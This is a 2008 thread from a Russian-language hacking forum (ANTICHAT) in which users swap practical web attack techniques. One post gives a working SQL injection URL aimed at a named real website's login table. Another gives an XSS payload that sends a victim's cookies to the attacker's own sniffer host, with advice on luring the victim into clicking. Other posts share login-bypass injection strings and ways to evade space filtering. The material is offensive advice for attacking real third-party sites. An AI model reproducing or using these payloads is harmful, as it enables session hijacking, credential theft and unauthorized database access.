ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.12.2008, 17:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
~EviL~
ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором... 
http://www.mcmusic.ie/index.asp?secID=-1+union+select+1,2,3,4,5+from+tbl_logins
|
|
|
04.12.2008, 18:53
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
Спасибо  Попробую довести до победного конца =) |
|
|
|
04.12.2008, 19:57
|
|
студент
Регистрация: 30.07.2007
Сообщений: 800
Провел на форуме:
4275992
Репутация:
1188
|
|
в этом деле новичок.
еще пока не научился использовать XSS но уже нашел парочку. может кому пригодится кто шарит в этом.
 
там в нескольких нужно вбивать в поля.
PS/ сильно не пинать я только учусь. |
|
|
|
04.12.2008, 20:02
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
а чо там использвать - втавляй вместо alert('xss') такой код:
window.location.href='http://твой_сайт/s.gif?'+document.cookie;
где s.gif - твой снифер
и давай такую ссылку, чтобы он по ней тыцкнул тому, чьи куки хочешь поиметь
|
|
|
|
04.12.2008, 22:54
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
с перенаправлением галимо и палевно. Лучше создавать картинку посредством яваскрипт
|
|
|
|
04.12.2008, 22:59
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Есть сервер с багнутым ПОСТ запросом.
Login, pwd.
Баг в первом варианте. Причем надо чтоб было хоть что - либо во втором.
Пример:
Login: ' or 1=(@@version)--
Pwd: kakawka
:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'or'.
Что посоветуете в данном вопросе? (чтоб вывело результат первого запроса)
|
|
|
|
04.12.2008, 23:59
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
У меня сейчас подобная проблема. При вводе вышеуказанной комбинации сервер отвечает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or1=1--' AND (IsNull(CodAff) OR CodAff='')' at line 1
/login.asp, line 16
Пробелы он не воспринимает. Как можно указать пробелы? Пытался
'%25or%151=1-- таки бестолку.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND (IsNull(CodAff) OR CodAff='')' at line 1
Последний раз редактировалось Ershik; 05.12.2008 в 11:56..
|
|
|
|
05.12.2008, 00:09
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Ershik
Как можно указать пробелы?
1'or'1'='1'
1)or(1)=(1)
1'or'1'='1
и т.д
Пробелы как таковые не нужны вообще
|
|
|
|
05.12.2008, 00:11
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Аналоги ПРОБЕЛА:
+ или %2B
|
|
|
|
05.12.2008, 00:21
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме:
109973
Репутация:
15
|
|
хм. +, либо еще /**/ бывает прокатывает
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
